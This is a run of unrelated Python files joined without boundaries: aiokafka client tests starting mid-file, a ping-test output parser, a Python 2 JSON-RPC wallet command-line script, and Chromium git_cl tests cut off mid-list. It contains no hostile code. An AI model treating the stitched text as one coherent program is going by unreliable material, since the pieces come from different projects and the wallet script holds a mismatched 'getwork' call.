self.assertEqual(md.partitions_for_topic('topic_4'), {0, 1}) self.assertEqual( md.available_partitions_for_topic('topic_2'), {1}) mocked_conns[(0, 0)].connected.return_value = False is_ready = await 
client.ready(0) self.assertEqual(is_ready, False) is_ready = await client.ready(1) self.assertEqual(is_ready, False) self.assertEqual(mocked_conns, {}) with self.assertRaises(NodeNotReadyError): await client.send(0, None) self.assertEqual(md.unauthorized_topics, {'topic_auth_error'}) @run_until_complete async def test_send_timeout_deletes_connection(self): correct_response = MetadataResponse([], []) async def send_exception(*args, **kwargs): raise asyncio.TimeoutError() async def send(*args, **kwargs): return correct_response async def get_conn(self, node_id, *, group=0): conn_id = (node_id, group) if conn_id in self._conns: conn = self._conns[conn_id] if not conn.connected(): del self._conns[conn_id] else: return conn conn = mock.MagicMock() conn.send.side_effect = send self._conns[conn_id] = conn return conn node_id = 0 conn = mock.MagicMock() conn.send.side_effect = send_exception conn.connected.return_value = True mocked_conns = {(node_id, 0): conn} client = AIOKafkaClient(bootstrap_servers=['broker_1:4567']) client._conns = mocked_conns client._get_conn = types.MethodType(get_conn, client) # first send timeouts with self.assertRaises(RequestTimedOutError): await client.send(0, MetadataRequest([])) conn.close.assert_called_once_with( reason=CloseReason.CONNECTION_TIMEOUT) # this happens because conn was closed conn.connected.return_value = False # second send gets new connection and obtains result response = await client.send(0, MetadataRequest([])) self.assertEqual(response, correct_response) self.assertNotEqual(conn, client._conns[(node_id, 0)]) @run_until_complete async def test_client_receive_zero_brokers(self): brokers = [ (0, 'broker_1', 4567), (1, 'broker_2', 5678) ] correct_meta = MetadataResponse(brokers, []) bad_response = MetadataResponse([], []) async def send(*args, **kwargs): return bad_response client = AIOKafkaClient(bootstrap_servers=['broker_1:4567'], api_version="0.10") conn = mock.Mock() client._conns = [mock.Mock()] async def _get_conn(*args: Any, **kwargs: Any): return conn client._get_conn = mock.Mock() client._get_conn.side_effect = _get_conn conn.send = mock.Mock() conn.send.side_effect = send client.cluster.update_metadata(correct_meta) brokers_before = client.cluster.brokers() await client._metadata_update(client.cluster, []) # There broker list should not be purged self.assertNotEqual(client.cluster.brokers(), set()) self.assertEqual(client.cluster.brokers(), brokers_before) @run_until_complete async def test_client_receive_zero_brokers_timeout_on_send(self): brokers = [ (0, 'broker_1', 4567), (1, 'broker_2', 5678) ] correct_meta = MetadataResponse(brokers, []) async def send(*args, **kwargs): raise asyncio.TimeoutError() client = AIOKafkaClient(bootstrap_servers=['broker_1:4567'], api_version="0.10") conn = mock.Mock() client._conns = [mock.Mock()] async def _get_conn(*args: Any, **kwargs: Any): return conn client._get_conn = mock.Mock() client._get_conn.side_effect = _get_conn conn.send = mock.Mock() conn.send.side_effect = send client.cluster.update_metadata(correct_meta) brokers_before = client.cluster.brokers() await client._metadata_update(client.cluster, []) # There broker list should not be purged self.assertNotEqual(client.cluster.brokers(), set()) self.assertEqual(client.cluster.brokers(), brokers_before) @run_until_complete async def test_bootstrap(self): client = AIOKafkaClient(bootstrap_servers='0.42.42.42:444') with self.assertRaises(KafkaConnectionError): await client.bootstrap() client = AIOKafkaClient(bootstrap_servers=self.hosts) await 
client.bootstrap() await self.wait_topic(client, 'test_topic') metadata = await client.fetch_all_metadata() self.assertTrue('test_topic' in metadata.topics()) client.set_topics(['t2', 't3']) client.set_topics(['t2', 't3']) # should be ignored client.add_topic('t2') # should be ignored # bootstrap again -- no error expected await client.bootstrap() await client.close() @run_until_complete async def test_failed_bootstrap(self): client = AIOKafkaClient(bootstrap_servers=self.hosts) with mock.patch.object(AIOKafkaConnection, 'send') as mock_send: mock_send.side_effect = KafkaError('some kafka error') with self.assertRaises(KafkaConnectionError): await client.bootstrap() @run_until_complete async def test_failed_bootstrap_timeout(self): client = AIOKafkaClient(bootstrap_servers=self.hosts) with mock.patch.object(AIOKafkaConnection, 'send') as mock_send: mock_send.side_effect = asyncio.TimeoutError('Timeout error') with self.assertRaises(KafkaConnectionError): await client.bootstrap() @run_until_complete async def test_send_request(self): client = AIOKafkaClient(bootstrap_servers=self.hosts) await client.bootstrap() node_id = client.get_random_node() resp = await client.send(node_id, MetadataRequest([])) self.assertTrue(isinstance(resp, MetadataResponse)) await client.close() @kafka_versions('<2.6') # FIXME Not implemented yet @run_until_complete async def test_check_version(self): kafka_version = tuple(int(x) for x in self.kafka_version.split(".")) client = AIOKafkaClient(bootstrap_servers=self.hosts) await client.bootstrap() ver = await client.check_version() expected_version = kafka_version[:2] self.assertEqual(expected_version, ver[:2]) await self.wait_topic(client, 'some_test_topic') ver2 = await client.check_version() self.assertEqual(ver, ver2) ver2 = await client.check_version(client.get_random_node()) self.assertEqual(ver, ver2) with mock.patch.object( AIOKafkaConnection, 'send') as mocked: mocked.side_effect = KafkaError('mocked exception') with self.assertRaises(UnrecognizedBrokerVersion): await client.check_version(client.get_random_node()) async def _get_conn(*args: Any, **kw: Any): return None client._get_conn = _get_conn with self.assertRaises(KafkaConnectionError): await client.check_version() await client.close() @run_until_complete async def test_metadata_synchronizer(self): client = AIOKafkaClient( bootstrap_servers=self.hosts, api_version="0.9", metadata_max_age_ms=10) with mock.patch.object( AIOKafkaClient, '_metadata_update') as mocked: async def dummy(*d, **kw): client.cluster.failed_update(None) mocked.side_effect = dummy await client.bootstrap() # wait synchronizer task timeout await asyncio.sleep(0.1) self.assertNotEqual( len(client._metadata_update.mock_calls), 0) await client.close() @run_until_complete async def test_metadata_update_fail(self): client = AIOKafkaClient(bootstrap_servers=self.hosts) await client.bootstrap() # Make sure the connection is initialize before mock to avoid crashing # api_version routine await client.force_metadata_update() with mock.patch.object( AIOKafkaConnection, 'send') as mocked: mocked.side_effect = KafkaError('mocked exception') updated = await client.force_metadata_update() self.assertEqual(updated, False) with self.assertRaises(KafkaError): await client.fetch_all_metadata() await client.close() @run_until_complete async def test_force_metadata_update_multiple_times(self): client = AIOKafkaClient( bootstrap_servers=self.hosts, metadata_max_age_ms=10000) await client.bootstrap() self.add_cleanup(client.close) orig = 
client._metadata_update with mock.patch.object(client, '_metadata_update') as mocked: async def new(*args, **kw): await asyncio.sleep(0.2) return (await orig(*args, **kw)) mocked.side_effect = new client.force_metadata_update() await asyncio.sleep(0.01) self.assertEqual( len(client._metadata_update.mock_calls), 1) client.force_metadata_update() await asyncio.sleep(0.01) self.assertEqual( len(client._metadata_update.mock_calls), 1) client.force_metadata_update() await asyncio.sleep(0.5) self.assertEqual( len(client._metadata_update.mock_calls), 1) @run_until_complete async def test_set_topics_trigger_metadata_update(self): client = AIOKafkaClient( bootstrap_servers=self.hosts, metadata_max_age_ms=10000) await client.bootstrap() self.add_cleanup(client.close) orig = client._metadata_update with mock.patch.object(client, '_metadata_update') as mocked: async def new(*args, **kw): await asyncio.sleep(0.01) return (await orig(*args, **kw)) mocked.side_effect = new await client.set_topics(["topic1"]) self.assertEqual( len(client._metadata_update.mock_calls), 1) # Same topics list should not trigger update await client.set_topics(["topic1"]) self.assertEqual( len(client._metadata_update.mock_calls), 1) await client.set_topics(["topic1", "topic2"]) self.assertEqual( len(client._metadata_update.mock_calls), 2) # Less topics should not update too await client.set_topics(["topic2"]) self.assertEqual( len(client._metadata_update.mock_calls), 2) # Setting [] should force update as it means all topics await client.set_topics([]) self.assertEqual( len(client._metadata_update.mock_calls), 3) # Changing topics during refresh should trigger 2 refreshes client.set_topics(["topic3"]) await asyncio.sleep(0.001) self.assertEqual( len(client._metadata_update.mock_calls), 4) await client.set_topics(["topic3", "topics4"]) self.assertEqual( len(client._metadata_update.mock_calls), 5) @run_until_complete async def test_metadata_updated_on_socket_disconnect(self): # Related to issue 176. A disconnect means that either we lost # connection to the node, or we have a node failure. In both cases # there's a high probability that Leader distribution will also change. 
client = AIOKafkaClient( bootstrap_servers=self.hosts, metadata_max_age_ms=10000) await client.bootstrap() self.add_cleanup(client.close) # Init a clonnection node_id = client.get_random_node() assert node_id is not None req = MetadataRequest([]) await client.send(node_id, req) # No metadata update pending atm self.assertFalse(client._md_update_waiter.done()) # Connection disconnect should trigger an update conn = await client._get_conn(node_id) conn.close(reason=CloseReason.CONNECTION_BROKEN) self.assertTrue(client._md_update_waiter.done()) @run_until_complete async def test_no_concurrent_send_on_connection(self): client = AIOKafkaClient( bootstrap_servers=self.hosts, metadata_max_age_ms=10000) await client.bootstrap() self.add_cleanup(client.close) await self.wait_topic(client, self.topic) node_id = client.get_random_node() wait_request = FetchRequest_v0( -1, # replica_id 500, # max_wait_ms 1024 * 1024, # min_bytes [(self.topic, [(0, 0, 1024)] )]) vanila_request = MetadataRequest([]) loop = get_running_loop() send_time = loop.time() long_task = create_task( client.send(node_id, wait_request) ) await asyncio.sleep(0.0001) self.assertFalse(long_task.done()) await client.send(node_id, vanila_request) resp_time = loop.time() fetch_resp = await long_task # Check error code like resp->topics[0]->partitions[0]->error_code self.assertEqual(fetch_resp.topics[0][1][0][1], 0) # Check that vanila request actually executed after wait request self.assertGreaterEqual(resp_time - send_time, 0.5) @run_until_complete async def test_different_connections_in_conn_groups(self): client = AIOKafkaClient( bootstrap_servers=self.hosts, metadata_max_age_ms=10000) await client.bootstrap() self.add_cleanup(client.close) node_id = client.get_random_node() broker = client.cluster.broker_metadata(node_id) client.cluster.add_coordinator( node_id, broker.host, broker.port, rack=None, purpose=(CoordinationType.GROUP, "")) conn1 = await client._get_conn(node_id) conn2 = await client._get_conn( node_id, group=ConnectionGroup.COORDINATION) self.assertTrue(conn1 is not conn2) self.assertEqual((conn1.host, conn1.port), (conn2.host, conn2.port)) @run_until_complete async def test_concurrent_send_on_different_connection_groups(self): client = AIOKafkaClient( bootstrap_servers=self.hosts, metadata_max_age_ms=10000) await client.bootstrap() self.add_cleanup(client.close) await self.wait_topic(client, self.topic) node_id = client.get_random_node() broker = client.cluster.broker_metadata(node_id) client.cluster.add_coordinator( node_id, broker.host, broker.port, rack=None, purpose=(CoordinationType.GROUP, "")) wait_request = FetchRequest_v0( -1, # replica_id 500, # max_wait_ms 1024 * 1024, # min_bytes [(self.topic, [(0, 0, 1024)] )]) vanila_request = MetadataRequest([]) loop = get_running_loop() send_time = loop.time() long_task = create_task( client.send(node_id, wait_request) ) await asyncio.sleep(0.0001) self.assertFalse(long_task.done()) await client.send( node_id, vanila_request, group=ConnectionGroup.COORDINATION) resp_time = loop.time() self.assertFalse(long_task.done()) fetch_resp = await long_task # Check error code like resp->topics[0]->partitions[0]->error_code self.assertEqual(fetch_resp.topics[0][1][0][1], 0) # Check that vanila request actually executed after wait request self.assertLess(resp_time - send_time, 0.5)
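# ----------------------------------------------------------------------
# Illustrative sketch (not part of the suite above): several tests here
# stub conn.send / client._get_conn with mocks whose side_effect raises
# asyncio.TimeoutError to exercise the failure path without a broker.
# A self-contained version of that mocking pattern, with a hypothetical
# FlakyClient standing in for AIOKafkaClient, might look like this:
# ----------------------------------------------------------------------
import asyncio
import unittest
from unittest import mock


class FlakyClient:
    """Hypothetical client: send() delegates to a connection object."""

    def __init__(self, conn):
        self._conn = conn

    async def send(self, request):
        try:
            return await self._conn.send(request)
        except asyncio.TimeoutError:
            self._conn.close()  # drop the broken connection, like the real client
            raise


class TestTimeoutClosesConnection(unittest.IsolatedAsyncioTestCase):
    async def test_timeout_closes_connection(self):
        conn = mock.Mock()
        conn.send = mock.AsyncMock(side_effect=asyncio.TimeoutError())
        client = FlakyClient(conn)

        with self.assertRaises(asyncio.TimeoutError):
            await client.send("metadata-request")

        conn.close.assert_called_once_with()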
# ------------------------------------------------------------------------
# This block checks to see if the script is being run directly,
# i.e. through the command line. If it is, then it stops and exits the
# program, asking the user to use these files by running the main.py
# ------------------------------------------------------------------------
try:
    from .utils import testForMain
except:
    from utils import testForMain
testForMain(__name__)

# ------------------------------------------------------------------------
# UDP.PY
#
# AUTHOR(S):    Peter Walker      pwalker@csumb.edu
#               Brandon Layton    blayton@csumb.edu
#
# PURPOSE-  This class will hold just an individual speed test (be it either a TCP or UDP test).
#           This will be where we have functions that do a lot of data analysis functions (like
#           standard deviation of TCP upload and download speed tests).
#
# VARIABLES:
#   ConnectionType      String, represents the type of connection
#   TestNumber          Integer, the number of this test from the original raw data file
#   RecieverIP          String, IP of the server this test is connected to
#   ConnectionLoc       String, represents where this test is connected to (East or West)
#   Times               Dictionary, holds all of the individual ping times in the test
#   PacketsSent         Integer, number of packets sent during the test
#   PacketsLost         Integer, number of packets not received by the recipient
#   RTTMin              Integer, RTT min recorded by the test
#   RTTMax              Integer, RTT max recorded by the test
#   RTTAverage          Integer, RTT average recorded by the test
#   isMobile            Boolean, if the test was on a mobile device, the format is different
#   ERROR               Boolean, if there was an error in the test, then this is True
#   ErrorMessage        String, the message that will be output when str is called
#   short_str_method    Boolean, used in SpeedTestDataStructure if the printout requested is short or long.
#                       Default is False
#
# FUNCTIONS:
#   __init__ - Used to initialize an object of this class
#       INPUTS-     self: reference to the object calling this method (i.e. Java's THIS)
#       OUTPUTS-    none
#
#   convert_Obj_To_2D - Converts this SpeedTestFile object into a 2D array, and returns the result
#       INPUTS-     self: reference to the object calling this method (i.e. Java's THIS)
#       OUTPUTS-    objectAs2D: the 2D array that will be returned
#
#   __str__ - Returns a string representation of the object
#       INPUTS-     self: reference to the object calling this method (i.e.
Java's THIS) # OUTPUTS- String, representing the attributes of the object (THIS) # ------------------------------------------------------------------------ from .utils import global_str_padding as pad; pad = pad*2 class PingTest(): # ------------------------ # Class variables ConnectionType = "PING" TestNumber = 0 RecieverIP = "UNKNOWN" ConnectionLoc = "UNKNOWN" Times = {} PacketsSent = 0 PacketsLost = 0 RTTMin = 0 RTTMax = 0 RTTAverage = 0 isMobile = True ERROR = False ErrorMessage = "" short_str_method = False # ------------------------ # DESC: Initializing class def __init__(self, dataString, testNum=0, isMobile=True, short=False): self.Times = {} self.text = dataString.split('\n') self.isMobile = isMobile self.TestNumber = testNum self.short_str_method = short #This block will declare this objects TestNumber for line in self.text: if ("Starting Test" in line) and (self.TestNumber == 0): self.TestNumber = line.split(" ")[2].split(":")[0].split("..")[0] break #END FOR #These are the two error cases I've noticed for Ping Tests if "Network is unreachable" in dataString: self.ERROR = True self.ErrorMessage = "Connection Error: Network is unreachable" return elif "Ping timed out" in dataString: self.ERROR = True self.ErrorMessage = "Connection Error: Ping Timed Out" return elif ("Quitting operations" in dataString) or ("Quitting Operations" in dataString): self.ERROR = True self.ErrorMessage = "Test quit by User." return #END IF/ELIF #Getting the Reciever IP address index = 0 pingCounter = 0 statsText = "ping statistics" if self.isMobile else "Ping statistics" pingText = "bytes from" if self.isMobile else "Reply from" pingErrors = ["Request timed out", "General failure", "host unreachable", "net unreachable" ] for line in self.text: #This test comes first so that, when we reach the statistics at the bottom, we read it, # parse it, and then break out of the loop before the other conditional are run if statsText in line: splitText = line.split(" ") for elem in splitText: if "184.72." in elem: self.RecieverIP = elem.strip() self.RecieverIP = self.RecieverIP[:-1] if not self.isMobile else self.RecieverIP break #END FOR index = self.text.index(line) break #Parse the individual ping times from the test else: pingCounter += 1 isErrorPresent = False #This checks to see if there are any error messages in the ping message. If there # was an error, the boolean isErrorPresent is made true, and the loop does not continue to # "if pingText in line", as the line will not have the information we need, and the .split() # will break. A time of 0 is inserted into self.Times as a placeholder. for error in pingErrors: if error in line: self.Times[pingCounter] = 0 isErrorPresent = True break if isErrorPresent: continue #END FOR if pingText in line: self.Times[pingCounter] = float(line.split("time=")[1].split("ms")[0].strip()) #END IF #END IF/ELSE #END FOR #Determining the Connection Location if self.RecieverIP == "184.72.222.65": self.ConnectionLoc = "East" if self.RecieverIP == "184.72.63.139": self.ConnectionLoc = "West" statsArr = self.text[index+1:] if self.isMobile: #First declare packetsLine to be the first element, and then split it by ",". 
# Then parse the packets sent and received, and deduce the packets lost packetsLine = statsArr[0] packetsLine = packetsLine.split(",") self.PacketsSent = float(packetsLine[0].split(" ")[0]) tempPacketsReceived = float(packetsLine[1].strip().split(" ")[0]) self.PacketsLost = self.PacketsSent - tempPacketsReceived #This try/except block is needed, as sometimes the min/avg/max numbers # are not printed out by iPerf. This happens in the case of 100% packet loss try: RTTLine = statsArr[1] RTTNums = RTTLine.split("=")[1][:-2].strip().split("/") self.RTTMin = float(RTTNums[0]) self.RTTAverage = float(RTTNums[1]) self.RTTMax = float(RTTNums[2]) except: using_defaults_of_0 = True else: #First declare packetsLine to tbe the first element, and then split it by ",". # Then parse the packets sent and lost packetsLine = statsArr[0] packetsLine = packetsLine.split(",") self.PacketsSent = float(packetsLine[0].split("=")[1].strip()) self.PacketsLost = float(packetsLine[2].split("=")[1].strip().split(" ")[0]) #This try/except block is needed, as sometimes the min/avg/max numbers # are not printed out by iPerf. This happens in the case of 100% packet loss try: RTTLine = statsArr[2] RTTLine = RTTLine.split(",") self.RTTMin = float(RTTLine[0].split("=")[1][:-2].strip()) self.RTTMax = float(RTTLine[1].split("=")[1][:-2].strip()) self.RTTAverage = float(RTTLine[2].split("=")[1][:-2].strip()) except: using_defaults_of_0 = True #END IF/ELSE #END DEF # DESC: This converts the object into a 2D representation of itself. Will return a 2D array # that will be used in the SpeedTestFile class. def convert_Obj_To_2D(self): objectAs2D = [] index = 0 objectAs2D.append(["","","Ping Sequence Num"]) #Adding the sequence numbers to correspong with the for t in range(10): objectAs2D[index].append(str(t+1)) #END FOR #These two lines set up the Test information in the array objectAs2D.append(["","","Test #" + self.TestNumber]) objectAs2D.append(["","","Ping " + self.ConnectionLoc]) objectAs2D.append(["","",""]) index +=1 #If the test has an error, then we print error. Otherwise, we array-itize the # threads and add then to the 2D array if (self.ERROR): objectAs2D[index].extend(["ERROR","ERROR","ERROR"]) return objectAs2D else: #Appending the ping Times for tIndex in self.Times: objectAs2D[index].append(self.Times[tIndex]) index += 1 #Appending the Packet information, and the RTT information objectAs2D[index].extend(["Packets Sent", self.PacketsSent, "Packets Lost", self.PacketsLost]) index += 1 objectAs2D[index].extend(["RTT Min", self.RTTMin, "RTT Avg", self.RTTAverage, "RTT Max", self.RTTMax]) #END IF/ELSE #Adding a little spacer between the tests. 
        objectAs2D.append(["",""])
        return objectAs2D
    #END DEF

    # DESC: Creating a string representation of our object
    def __str__(self):
        this_str = (pad + "Test Number: " + str(self.TestNumber) + "\n" +
                    pad + "Connection Type: " + str(self.ConnectionType) + "\n" +
                    pad + "Connection Location: " + str(self.ConnectionLoc) + "\n"
                    )
        if self.ERROR:
            this_str += pad + " ERROR: " + str(self.ErrorMessage) + "\n"
        else:
            if not self.short_str_method:
                #Printing the individual pings in the ping test
                this_str += pad + "Ping Times: "
                for index in self.Times:
                    this_str += (str(index) + "=" + str(self.Times[index]) + "ms, ")
                this_str = this_str[:-2] + "\n"
                #Printing the rest of the information
                this_str += (pad + "Packets Sent: " + str(self.PacketsSent) + "\n" +
                             pad + "Packets Lost: " + str(self.PacketsLost) + "\n" +
                             pad + "Round Trip Time Minimum: " + str(self.RTTMin) + "\n" +
                             pad + "Round Trip Time Maximum: " + str(self.RTTMax) + "\n" +
                             pad + "Round Trip Time Average: " + str(self.RTTAverage) + "\n"
                             )
            else:
                #Multiply the lost/sent ratio by 100 so the value labeled as a percentage really is one
                this_str += (pad + "Packet Loss Percentage: " + str(100.0 * self.PacketsLost / self.PacketsSent) + "%\n" +
                             pad + "Round Trip Time Average: " + str(self.RTTAverage) + "\n"
                             )
            #END IF/ELSE
        #END IF/ELSE
        return this_str
    #END DEF
#END CLASS
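# ----------------------------------------------------------------------
# Illustrative sketch (not part of the class above): PingTest pulls the
# round-trip time out of each reply line by splitting on "time=" and
# "ms", and derives packets lost from the summary counts. A standalone
# version of that parsing, with a made-up sample reply line, might look
# like this:
# ----------------------------------------------------------------------
def parse_ping_time(line):
    """Return the round-trip time in ms from a single ping reply line."""
    return float(line.split("time=")[1].split("ms")[0].strip())

def packet_loss_percent(sent, received):
    """Percentage of packets that never came back."""
    return 100.0 * (sent - received) / sent if sent else 0.0

# Example usage (the reply line below is illustrative, not captured data):
#   parse_ping_time("64 bytes from 184.72.222.65: icmp_seq=1 ttl=49 time=87.4 ms")  -> 87.4
#   packet_loss_percent(10, 9)                                                      -> 10.0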
from jsonrpc import ServiceProxy import sys import string # ===== BEGIN USER SETTINGS ===== # if you do not set these you will be prompted for a password for every command rpcuser = "" rpcpass = "" # ====== END USER SETTINGS ====== if rpcpass == "": access = ServiceProxy("http://127.0.0.1:11555") else: access = ServiceProxy("http://"+rpcuser+":"+rpcpass+"@127.0.0.1:11555") cmd = sys.argv[1].lower() if cmd == "backupwallet": try: path = raw_input("Enter destination path/filename: ") print access.backupwallet(path) except: print "\n---An error occurred---\n" elif cmd == "getaccount": try: addr = raw_input("Enter a Flaircoin address: ") print access.getaccount(addr) except: print "\n---An error occurred---\n" elif cmd == "getaccountaddress": try: acct = raw_input("Enter an account name: ") print access.getaccountaddress(acct) except: print "\n---An error occurred---\n" elif cmd == "getaddressesbyaccount": try: acct = raw_input("Enter an account name: ") print access.getaddressesbyaccount(acct) except: print "\n---An error occurred---\n" elif cmd == "getbalance": try: acct = raw_input("Enter an account (optional): ") mc = raw_input("Minimum confirmations (optional): ") try: print access.getbalance(acct, mc) except: print access.getbalance() except: print "\n---An error occurred---\n" elif cmd == "getblockbycount": try: height = raw_input("Height: ") print access.getblockbycount(height) except: print "\n---An error occurred---\n" elif cmd == "getblockcount": try: print access.getblockcount() except: print "\n---An error occurred---\n" elif cmd == "getblocknumber": try: print access.getblocknumber() except: print "\n---An error occurred---\n" elif cmd == "getconnectioncount": try: print access.getconnectioncount() except: print "\n---An error occurred---\n" elif cmd == "getdifficulty": try: print access.getdifficulty() except: print "\n---An error occurred---\n" elif cmd == "getgenerate": try: print access.getgenerate() except: print "\n---An error occurred---\n" elif cmd == "gethashespersec": try: print access.gethashespersec() except: print "\n---An error occurred---\n" elif cmd == "getinfo": try: print access.getinfo() except: print "\n---An error occurred---\n" elif cmd == "getnewaddress": try: acct = raw_input("Enter an account name: ") try: print access.getnewaddress(acct) except: print access.getnewaddress() except: print "\n---An error occurred---\n" elif cmd == "getreceivedbyaccount": try: acct = raw_input("Enter an account (optional): ") mc = raw_input("Minimum confirmations (optional): ") try: print access.getreceivedbyaccount(acct, mc) except: print access.getreceivedbyaccount() except: print "\n---An error occurred---\n" elif cmd == "getreceivedbyaddress": try: addr = raw_input("Enter a Flaircoin address (optional): ") mc = raw_input("Minimum confirmations (optional): ") try: print access.getreceivedbyaddress(addr, mc) except: print access.getreceivedbyaddress() except: print "\n---An error occurred---\n" elif cmd == "gettransaction": try: txid = raw_input("Enter a transaction ID: ") print access.gettransaction(txid) except: print "\n---An error occurred---\n" elif cmd == "getwork": try: data = raw_input("Data (optional): ") try: print access.gettransaction(data) except: print access.gettransaction() except: print "\n---An error occurred---\n" elif cmd == "help": try: cmd = raw_input("Command (optional): ") try: print access.help(cmd) except: print access.help() except: print "\n---An error occurred---\n" elif cmd == "listaccounts": try: mc = raw_input("Minimum confirmations 
(optional): ") try: print access.listaccounts(mc) except: print access.listaccounts() except: print "\n---An error occurred---\n" elif cmd == "listreceivedbyaccount": try: mc = raw_input("Minimum confirmations (optional): ") incemp = raw_input("Include empty? (true/false, optional): ") try: print access.listreceivedbyaccount(mc, incemp) except: print access.listreceivedbyaccount() except: print "\n---An error occurred---\n" elif cmd == "listreceivedbyaddress": try: mc = raw_input("Minimum confirmations (optional): ") incemp = raw_input("Include empty? (true/false, optional): ") try: print access.listreceivedbyaddress(mc, incemp) except: print access.listreceivedbyaddress() except: print "\n---An error occurred---\n" elif cmd == "listtransactions": try: acct = raw_input("Account (optional): ") count = raw_input("Number of transactions (optional): ") frm = raw_input("Skip (optional):") try: print access.listtransactions(acct, count, frm) except: print access.listtransactions() except: print "\n---An error occurred---\n" elif cmd == "move": try: frm = raw_input("From: ") to = raw_input("To: ") amt = raw_input("Amount:") mc = raw_input("Minimum confirmations (optional): ") comment = raw_input("Comment (optional): ") try: print access.move(frm, to, amt, mc, comment) except: print access.move(frm, to, amt) except: print "\n---An error occurred---\n" elif cmd == "sendfrom": try: frm = raw_input("From: ") to = raw_input("To: ") amt = raw_input("Amount:") mc = raw_input("Minimum confirmations (optional): ") comment = raw_input("Comment (optional): ") commentto = raw_input("Comment-to (optional): ") try: print access.sendfrom(frm, to, amt, mc, comment, commentto) except: print access.sendfrom(frm, to, amt) except: print "\n---An error occurred---\n" elif cmd == "sendmany": try: frm = raw_input("From: ") to = raw_input("To (in format address1:amount1,address2:amount2,...): ") mc = raw_input("Minimum confirmations (optional): ") comment = raw_input("Comment (optional): ") try: print access.sendmany(frm,to,mc,comment) except: print access.sendmany(frm,to) except: print "\n---An error occurred---\n" elif cmd == "sendtoaddress": try: to = raw_input("To (in format address1:amount1,address2:amount2,...): ") amt = raw_input("Amount:") comment = raw_input("Comment (optional): ") commentto = raw_input("Comment-to (optional): ") try: print access.sendtoaddress(to,amt,comment,commentto) except: print access.sendtoaddress(to,amt) except: print "\n---An error occurred---\n" elif cmd == "setaccount": try: addr = raw_input("Address: ") acct = raw_input("Account:") print access.setaccount(addr,acct) except: print "\n---An error occurred---\n" elif cmd == "setgenerate": try: gen= raw_input("Generate? 
(true/false): ") cpus = raw_input("Max processors/cores (-1 for unlimited, optional):") try: print access.setgenerate(gen, cpus) except: print access.setgenerate(gen) except: print "\n---An error occurred---\n" elif cmd == "settxfee": try: amt = raw_input("Amount:") print access.settxfee(amt) except: print "\n---An error occurred---\n" elif cmd == "stop": try: print access.stop() except: print "\n---An error occurred---\n" elif cmd == "validateaddress": try: addr = raw_input("Address: ") print access.validateaddress(addr) except: print "\n---An error occurred---\n" elif cmd == "walletpassphrase": try: pwd = raw_input("Enter wallet passphrase: ") access.walletpassphrase(pwd, 60) print "\n---Wallet unlocked---\n" except: print "\n---An error occurred---\n" elif cmd == "walletpassphrasechange": try: pwd = raw_input("Enter old wallet passphrase: ") pwd2 = raw_input("Enter new wallet passphrase: ") access.walletpassphrasechange(pwd, pwd2) print print "\n---Passphrase changed---\n" except: print print "\n---An error occurred---\n" print else: print "Command not found or not supported"
#!/usr/bin/env python # Copyright (c) 2012 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Unit tests for git_cl.py.""" import os import StringIO import stat import sys import unittest import re sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__)))) from testing_support.auto_stub import TestCase import git_cl import git_common import subprocess2 import presubmit_support class PresubmitMock(object): def __init__(self, *args, **kwargs): self.reviewers = [] @staticmethod def should_continue(): return True class RietveldMock(object): def __init__(self, *args, **kwargs): pass @staticmethod def get_description(issue): return 'Issue: %d' % issue @staticmethod def get_issue_properties(_issue, _messages): return { 'reviewers': ['joe@chromium.org', 'john@chromium.org'], 'messages': [ { 'approval': True, 'sender': 'john@chromium.org', }, ], } class WatchlistsMock(object): def __init__(self, _): pass @staticmethod def GetWatchersForPaths(_): return ['joe@example.com'] class CodereviewSettingsFileMock(object): def __init__(self): pass # pylint: disable=R0201 def read(self): return ("CODE_REVIEW_SERVER: gerrit.chromium.org\n" + "GERRIT_HOST: gerrit.chromium.org\n" + "GERRIT_PORT: 29418\n") class TestGitCl(TestCase): def setUp(self): super(TestGitCl, self).setUp() self.calls = [] self._calls_done = 0 self.mock(subprocess2, 'call', self._mocked_call) self.mock(subprocess2, 'check_call', self._mocked_call) self.mock(subprocess2, 'check_output', self._mocked_call) self.mock(subprocess2, 'communicate', self._mocked_call) self.mock(subprocess2, 'Popen', self._mocked_call) self.mock(git_common, 'get_or_create_merge_base', lambda *a: ( self._mocked_call(['get_or_create_merge_base']+list(a)))) self.mock(git_cl, 'FindCodereviewSettingsFile', lambda: '') self.mock(git_cl, 'ask_for_data', self._mocked_call) self.mock(git_cl.breakpad, 'post', self._mocked_call) self.mock(git_cl.breakpad, 'SendStack', self._mocked_call) self.mock(git_cl.presubmit_support, 'DoPresubmitChecks', PresubmitMock) self.mock(git_cl.rietveld, 'Rietveld', RietveldMock) self.mock(git_cl.rietveld, 'CachingRietveld', RietveldMock) self.mock(git_cl.upload, 'RealMain', self.fail) self.mock(git_cl.watchlists, 'Watchlists', WatchlistsMock) # It's important to reset settings to not have inter-tests interference. git_cl.settings = None def tearDown(self): if not self.has_failed(): self.assertEquals([], self.calls) super(TestGitCl, self).tearDown() def _mocked_call(self, *args, **_kwargs): self.assertTrue( self.calls, '@%d Expected: <Missing> Actual: %r' % (self._calls_done, args)) expected_args, result = self.calls.pop(0) # Also logs otherwise it could get caught in a try/finally and be hard to # diagnose. 
if expected_args != args: msg = '@%d Expected: %r Actual: %r' % ( self._calls_done, expected_args, args) git_cl.logging.error(msg) self.fail(msg) self._calls_done += 1 return result @classmethod def _upload_calls(cls, similarity, find_copies, private): return (cls._git_base_calls(similarity, find_copies) + cls._git_upload_calls(private)) @classmethod def _upload_no_rev_calls(cls, similarity, find_copies): return (cls._git_base_calls(similarity, find_copies) + cls._git_upload_no_rev_calls()) @classmethod def _git_base_calls(cls, similarity, find_copies): if similarity is None: similarity = '50' similarity_call = ((['git', 'config', '--int', '--get', 'branch.master.git-cl-similarity'],), '') else: similarity_call = ((['git', 'config', '--int', 'branch.master.git-cl-similarity', similarity],), '') if find_copies is None: find_copies = True find_copies_call = ((['git', 'config', '--int', '--get', 'branch.master.git-find-copies'],), '') else: val = str(int(find_copies)) find_copies_call = ((['git', 'config', '--int', 'branch.master.git-find-copies', val],), '') if find_copies: stat_call = ((['git', 'diff', '--no-ext-diff', '--stat', '--find-copies-harder', '-l100000', '-C'+similarity, 'fake_ancestor_sha', 'HEAD'],), '+dat') else: stat_call = ((['git', 'diff', '--no-ext-diff', '--stat', '-M'+similarity, 'fake_ancestor_sha', 'HEAD'],), '+dat') return [ ((['git', 'config', 'rietveld.autoupdate'],), ''), ((['git', 'config', 'rietveld.server'],), 'codereview.example.com'), 